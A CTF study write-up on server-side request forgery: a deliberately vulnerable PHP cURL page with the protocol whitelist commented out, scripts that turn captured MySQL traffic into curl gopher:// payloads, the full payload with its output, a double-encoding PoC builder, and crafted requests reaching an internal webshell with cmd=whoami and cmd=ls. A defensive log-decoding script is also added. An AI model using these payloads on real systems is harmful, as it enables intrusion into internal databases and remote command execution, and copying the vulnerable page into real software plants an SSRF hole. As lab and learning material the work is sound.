SSRF and MySQL Study Notes


Study notes: SSRF and an internal-network MySQL

1. Background

A CTF challenge required this, so I combined the experience of various experts online and summarised the whole process as a learning exercise.

Reference: https://xz.aliyun.com/t/6993

A newbie learning as the challenges demand (and, incidentally, a first attempt at writing a blog post in a proper format).

2. Environment setup

First set up a local Apache/Nginx + PHP environment for testing.

Kali 2020 server: 10.0.0.135

Windows 10 client

ssrf.php

```php
<?php
$ch = curl_init(); // create a new cURL resource
curl_setopt($ch, CURLOPT_URL, $_GET['url']); // set the URL (user-controlled, hence the SSRF) and related options
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
// left commented out: this is the option that would restrict cURL to http/https and block gopher://
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch); // fetch the URL and pass the response through to the browser
curl_close($ch); // close the cURL resource and free system resources
?>
```

Start MySQL and create a passwordless test user named curl.

Visit http://10.0.0.135/ssrf.php?url=https://www.baidu.com to confirm that the environment works.

3. Local testing

1. Data processing

On Kali 2020, open Wireshark and enter "mysql" as the display filter.

In a terminal, log in to MySQL with:

    mysql -h 127.0.0.1 -u curl -p

Then run the MySQL commands:

    select now();
    exit;

Now look at Wireshark.

Choose Follow -> TCP Stream.

Select the data sent to port 3306 and set "Show and save data as" to Raw, as shown in the figure.

Copy the raw data out and remove the line breaks so that it becomes a single line.

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

Then URL-encode it.

2. Testing the gopher protocol

Open two terminals on Kali 2020 so the results can be compared.

The leading h was swallowed (curl treats the first character of the gopher path as the item type), so add a placeholder character _ and try again.

3. Usage

Combining steps 1 and 2, the data is sent to MySQL over gopher; the processed single line of data is run through the following script:

pocmake.py

```python
# encoding: utf-8
# Turn one line of hex (the raw TCP stream saved from Wireshark) into a curl
# gopher:// command: every byte becomes a %xx escape, with "_" as the
# placeholder item-type character that curl drops.
import sys


def result(s):
    a = [s[i:i + 2] for i in range(0, len(s), 2)]
    return "curl gopher://127.0.0.1:3306/_%" + "%".join(a)


if __name__ == '__main__':
    s = sys.argv[1]
    print(result(s))
```
```text
root@kali:~/桌面# python pocmake.py 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
curl gopher://127.0.0.1:3306/_%bb%00%00%01%84%a6%9f%20%00%00%00%01%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%07%00%00%00%63%75%72%6c%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%7e%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%0a%6c%69%62%6d%61%72%69%61%64%62%04%5f%70%69%64%05%31%39%32%34%38%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%05%33%2e%31%2e%36%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0c%5f%73%65%72%76%65%72%5f%68%6f%73%74%09%31%32%37%2e%30%2e%30%2e%31%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%0d%00%00%00%03%73%65%6c%65%63%74%20%6e%6f%77%28%29%01%00%00%00%01
root@kali:~/桌面# curl gopher://127.0.0.1:3306/_%bb%00%00%01%84%a6%9f%20%00%00%00%01%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%07%00%00%00%63%75%72%6c%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%7e%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%0a%6c%69%62%6d%61%72%69%61%64%62%04%5f%70%69%64%05%31%39%32%34%38%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%05%33%2e%31%2e%36%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0c%5f%73%65%72%76%65%72%5f%68%6f%73%74%09%31%32%37%2e%30%2e%30%2e%31%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%0d%00%00%00%03%73%65%6c%65%63%74%20%6e%6f%77%28%29%01%00%00%00%01 --output -
[
curl: (56) Recv failure: 連接被對方重設
5.5.5-10.3.21-MariaDB-2Gkc0c%*E[��-��ztX<aS][1!OLmysql_native_password'def@@version_comment
                                                                                           -X�'�Debian buildd-unstable�efnow()
                   ?
                    ��2020-03-16 05:52:00�root@kali:~/桌面# 
```
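As an added example (not part of the original post), the following Python 3 script does the reverse of pocmake.py from a defender's side: given a web-server access-log line, it decodes the gopher:// value of the url= parameter back into the MySQL packets it carried, so a log review can show exactly which queries were smuggled to port 3306. The log line is constructed; the gopher URL inside it is the tail of the capture shown above (the two queries and the COM_QUIT).

```python
import re
from urllib.parse import parse_qs, quote, unquote_to_bytes, urlsplit

COMMANDS = {0x01: "COM_QUIT", 0x03: "COM_QUERY"}  # command bytes seen in the capture

# Gopher URL copied from the tail of the capture above: two COM_QUERY packets
# ("select @@version_comment limit 1", "select now()") followed by COM_QUIT.
GOPHER_URL = ("gopher://127.0.0.1:3306/_%21%00%00%00%03%73%65%6c%65%63%74%20%40%40"
              "%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31"
              "%0d%00%00%00%03%73%65%6c%65%63%74%20%6e%6f%77%28%29%01%00%00%00%01")

# Constructed access-log line (not from the post). On the wire the url= value
# is percent-encoded a second time, the double encoding the post ran into.
SAMPLE_LOG = ('10.0.0.135 - - [16/Mar/2020:05:52:00 +0000] "GET /ssrf.php?url='
              + quote(GOPHER_URL, safe="") + ' HTTP/1.1" 200 512')

def mysql_packets(stream):
    """Yield (sequence_id, payload); each packet starts with a 3-byte LE length and 1-byte sequence."""
    pos = 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated MySQL packet at offset %d" % pos)
        yield stream[pos + 3], payload
        pos += 4 + length

def decode_mysql_stream(raw):
    """Name each packet: sequence 1 is the login, whose NUL-terminated username follows 32 fixed bytes."""
    found = []
    for seq, payload in mysql_packets(raw):
        if seq == 1:
            found.append(("LOGIN", payload[32:].split(b"\x00", 1)[0].decode("latin-1")))
        else:
            found.append((COMMANDS.get(payload[0], "0x%02x" % payload[0]),
                          payload[1:].decode("latin-1")))
    return found

def decode_ssrf_log_line(line):
    """Return the MySQL packets smuggled in url=, or None for other requests."""
    match = re.search(r'"GET (\S+) HTTP/', line)
    if not match:
        return None
    url_param = parse_qs(urlsplit(match.group(1)).query).get("url", [""])[0]
    target = urlsplit(url_param)  # PHP's $_GET already removed the outer encoding
    if target.scheme != "gopher" or target.port != 3306:
        return None
    # curl drops the leading "/" and the one-character item type ("_"), then
    # percent-decodes the rest into the raw bytes written to the socket.
    return decode_mysql_stream(unquote_to_bytes(target.path[2:]))
```

Run against the full URL from the transcript above, the first packet (sequence 1) would be reported as a LOGIN for the user curl, followed by the same two queries and the COM_QUIT.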

4. Further extension

The MySQL instance in the real challenge has a password... so the database route is out; instead, use gopher to send GET/POST requests directly to the webshell that comes with the challenge's internal network.

https://www.cnblogs.com/Zhu013/p/12540419.html

The complex version, with a packet I built myself after studying the reference

Capture the request with Burp and change the Host header:

```http
GET /exp.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

Pitfalls: the double URL encoding and the handling of spaces and line breaks took a long time to sort out. In the end there must be two %0a%0d sequences, i.e. carriage return + line feed, at the end, otherwise the request times out (?). Written up as a PoC:

newpoc.py

```python
# coding: utf-8
# Build the double-encoded gopher:// URL for the SSRF parameter from a raw
# HTTP request saved in post.txt (captured with Burp).
from urllib.parse import quote


def request_hex():
    # POST data captured with Burp; read as bytes so nothing is re-encoded
    with open('post.txt', 'rb') as f:
        return f.read().hex()


def results(s):
    a = [s[i:i + 2] for i in range(0, len(s), 2)]
    return "gopher://127.0.0.1:80/_%" + "%".join(a)


if __name__ == "__main__":
    url = results(request_hex())
    # the URL must be encoded once more before it is used in the ?url= parameter
    print(quote(url))
```

The writeup's version (from experience)

Replace spaces with %20, '?' with %253F, and '+' with %2b.

Write it directly as gopher://127.0.0.1:80/_GET%20/test.php%253fcmd=ls
